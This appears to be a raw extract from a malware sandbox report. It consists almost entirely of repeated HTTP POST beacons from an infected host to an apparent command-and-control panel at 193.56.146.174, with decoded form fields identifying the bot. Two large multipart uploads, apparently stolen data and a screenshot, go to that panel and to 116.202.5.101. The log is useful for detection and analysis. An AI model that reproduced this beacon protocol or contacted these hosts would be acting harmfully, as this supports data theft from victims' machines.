                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0961775035082528Host: 116.202.5.101Content-Length: 112294Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODMxMDQ=Host: 193.56.146.174Content-Length: 83256Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
